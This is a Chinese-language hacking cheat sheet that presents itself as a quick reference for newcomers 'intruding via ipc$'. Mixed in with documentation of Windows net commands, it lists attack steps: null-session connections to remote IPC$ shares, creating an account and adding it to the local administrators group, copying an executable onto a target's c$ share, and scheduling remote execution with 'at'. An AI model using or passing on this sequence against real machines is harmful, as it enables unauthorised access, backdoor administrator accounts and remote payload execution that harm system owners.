利用ipc$入侵的相關(guān)命令：
我們在入侵的時候難免遇到忘記命令的時候，現(xiàn)在將我所知道的一些命令總結(jié)出來提供給各位。通過這些命令可以解決很大一部分新手的問題。
00:net use
作用：連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。
　　命令格式：
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
參數(shù)介紹：
(1)鍵入不帶參數(shù)的net use列出網(wǎng)絡(luò)連接。
　　(2)devicename指定要連接到的資源名稱或要斷開的設(shè)備名稱。
　　(3)\\\\computername\\sharename服務(wù)器及共享資源的名稱。
　　(4)password訪問共享資源的密碼。
　　(5)*提示鍵入密碼。
　　(6)/user指定進行連接的另外一個用戶。
　　(7)domainname指定另一個域。
　 (8)username指定登錄的用戶名。
　　(9)/home將用戶連接到其宿主目錄。
　　(10)/delete取消指定網(wǎng)絡(luò)連接。
　　(11)/persistent控制永久網(wǎng)絡(luò)連接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空連接
02: net use \\\\X.X.X.X\\ipc$ \"密碼\" /user:\"用戶名\" 建立非空連接
03: net use \\\\X.X.X.X\\ipc$ /del 刪除連接
04: net time \\\\X.X.X.X
作用：使計算機的時鐘與另一臺計算機或域的時間同步。
　　命令格式：net time [\\\\computername | /domain[:name]] [/set]
　　參數(shù)介紹：
　　(1)\\\\computername要檢查或同步的服務(wù)器名。
　　(2)/domain[:name]指定要與其時間同步的域。
　　(3)/set使本計算機時鐘與指定計算機或域的時鐘同步。
05: net view \\\\X.X.X.X
　　作用：顯示域列表、計算機列表或指定計算機的共享資源列表。
　　命令格式：net view [\\\\computername | /domain[:domainname]]
　 參數(shù)介紹：
(1)鍵入不帶參數(shù)的net view顯示當(dāng)前域的計算機列表。
　　(2)\\\\computername 指定要查看其共享資源的計算機。
　　(3)/domain[:domainname]指定要查看其可用計算機的域。
06: net use X: \\\\X.X.X.X\\Y 將共享名為Y的共享資源映射為本地X盤
07: net use X: /del 刪除映射的X盤
08: net share
作用：創(chuàng)建、刪除或顯示共享資源。
　　命令格式：net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"] 　　
參數(shù)介紹：(1)鍵入不帶參數(shù)的net share顯示本地計算機上所有共享資源的信息。 　 (2)sharename是共享資源的網(wǎng)絡(luò)名稱。
　　(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設(shè)置可同時訪問共享資源的最大用戶數(shù)。
　　(5)/unlimited不限制同時訪問共享資源的用戶數(shù)。
　　(6)/remark:\"text \"添加關(guān)于資源的注釋，注釋文字用引號引住。
09: net user
作用：添加或更改用戶帳號或顯示用戶帳號信息。
該命令也可以寫為 net users
　　命令格式：net user [username [password | *] [options]] [/domain]
　　參數(shù)介紹：(1)鍵入不帶參數(shù)的net user查看計算機上的用戶帳號列表。
　　(2)username添加、刪除、更改或查看用戶帳號名。
　　(3)password為用戶帳號分配或更改密碼。
　　(4)*提示輸入密碼。
　　(5)/domain在計算機主域的主域控制器中執(zhí)行操作。
10: net start 作用：啟動服務(wù)，或顯示已啟動服務(wù)的列表。
11: net pause 作用：暫停正在運行的服務(wù)。
12: net Continue 作用：重新激活掛起的服務(wù)。
13: net stop
作用：停止 Windows NT 網(wǎng)絡(luò)服務(wù)。
　　命令格式：net stop service
　　參數(shù)介紹：
　　(1)alerter(警報)
　　(2)client service for netware(Netware 客戶端服務(wù))
　　(3)clipbook server(剪貼簿服務(wù)器)
　　(4)computer browser(計算機瀏覽器)
　　(5)directory replicator(目錄復(fù)制器)
　　(6)ftp publishing service (ftp )(ftp 發(fā)行服務(wù))
　　(7)lpdsvc
　　(8)net logon(網(wǎng)絡(luò)登錄)
　　(9)network dde(網(wǎng)絡(luò) dde)
　　(10)network dde dsdm(網(wǎng)絡(luò) dde dsdm)
　　(11)network monitor agent(網(wǎng)絡(luò)監(jiān)控代理)
　　(12)nt lm security support provider(NT LM 安全性支持提供)
　　(13)ole(對象鏈接與嵌入)
　　(14)remote access connection manager(遠程訪問連接管理器)
　　(15)remote access isnsap service(遠程訪問 isnsap 服務(wù))
　　(16)remote access server(遠程訪問服務(wù)器)
　　(17)remote procedure call (rpc) locator(遠程過程調(diào)用定位器)
　　(18)remote procedure call (rpc) service(遠程過程調(diào)用服務(wù))
　　(19)schedule(調(diào)度)
　　(20)server(服務(wù)器)
　　(21)simple tcp/ip services(簡單 TCP/IP 服務(wù))
　　(22)snmp
　　(23)spooler(后臺打印程序)
　　(24)tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
　　(25)ups
　　(26)workstation(工作站)
　　(27)messenger(信使)
　　(28)dhcp client
　　(29)eventlog
14:net Statistics
　　作用：顯示本地工作站或服務(wù)器服務(wù)的統(tǒng)計記錄。
　　命令格式：net statistics [workstation | server]
　　參數(shù)介紹：(1)鍵入不帶參數(shù)的net statistics列出其統(tǒng)計信息可用的運行服務(wù)。
　 (2)workstation顯示本地工作站服務(wù)的統(tǒng)計信息。
　　(3)server顯示本地服務(wù)器服務(wù)的統(tǒng)計信息。 　
　 例：net statistics server | more顯示服務(wù)器服務(wù)的統(tǒng)計信息。
15:net Session ( 等同于net sessions 或net sess)
　作用：列出或斷開本地計算機和與之連接的客戶端的會話.
　命令格式：net session [\\\\computername] [/delete]
　參數(shù)介紹：(1)鍵入不帶參數(shù)的net session顯示所有與本地計算機的會話的信息。
(2)\\\\computername標識要列出或斷開會話的計算機。
　舉例說明： net session \\\\cnse8要顯示計算機名為cnse8的客戶端會話信息列表。

15: net user 帳號名 密碼 /add 添加帳號和密碼
16: net user 帳號名 /active:yes 激活帳號
17: net localgroup administrators 帳號名 /add 將該帳號加入本地admin組
18: Net Send
　　作用：向網(wǎng)絡(luò)的其他用戶、計算機或通信名發(fā)送消息。
　　命令格式：net send {name | * | /domain[:name] | /users} message
　　參數(shù)介紹：(1)name要接收發(fā)送消息的用戶名、計算機名或通信名。
　 (2)*將消息發(fā)送到組中所有名稱。
　　(3)/domain[:name]將消息發(fā)送到計算機域中的所有名稱。
　　(4)/users將消息發(fā)送到與服務(wù)器連接的所有用戶。
　　(5)message作為消息發(fā)送的文本。
　　例:(1)net send /users Welcome to cnse8.com 向所有的連接本機的用戶顯示 \"Welcome to cnse8.com\"
19:net Config
　 作用：顯示當(dāng)前運行的可配置服務(wù)，或顯示并更改某項服務(wù)的設(shè)置。
　 命令格式：net config [service [options]]
參數(shù)介紹：
(1)鍵入不帶參數(shù)的net config顯示可配置服務(wù)的列表。
(2)service通過net config命令進行配置的服務(wù)(server或workstation)。
(3)options服務(wù)的特定選項。
20:net Accounts
　 作用：更新用戶帳號數(shù)據(jù)庫、更改密碼及所有帳號的登錄要求。
　 命令格式：net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
　 參數(shù)介紹：
(1)鍵入不帶參數(shù)的net accounts顯示當(dāng)前密碼設(shè)置、登錄時限及域信息。
(2)/forcelogoff:{minutes | no}設(shè)置當(dāng)用戶帳號或有效登錄時間過期時。
(3)/minpwlen:length設(shè)置用戶帳號密碼的最少字符數(shù)。
(4)/maxpwage:{days | unlimited}設(shè)置用戶帳號密碼有效的最大天數(shù)。
(5)/minpwage:days設(shè)置用戶必須保持原密碼的最小天數(shù)。
(6)/uniquepw:number要求用戶更改密碼時，必須在經(jīng)過number次后才能重復(fù)使用與 之相同的密碼。
(7)/domain在當(dāng)前域的主域控制器上執(zhí)行該操作。
(8)/sync當(dāng)用于主域控制器時，該命令使域中所有備份域控制器同步。
　　舉例說明：net accounts /minpwlen:7將用戶帳號密碼的最少字符數(shù)設(shè)置為7。
21:copy 路徑 \\ 文件名 \\IP\\共享目錄名
例：copy c:\\cnse8.exe \\\\X.X.X.X\\c$ 將c盤下的cnse8.exe文件復(fù)制到對方得的c 盤內(nèi)。
copy \\\\X.X.X.X\\c$\\cnse8.exe c:\\ 將遠程機器上的文件cnse8.exe復(fù)制到自己
機器上。
22:at \\\\IP 時間 程序名 遠程添加某個計劃.

最新評論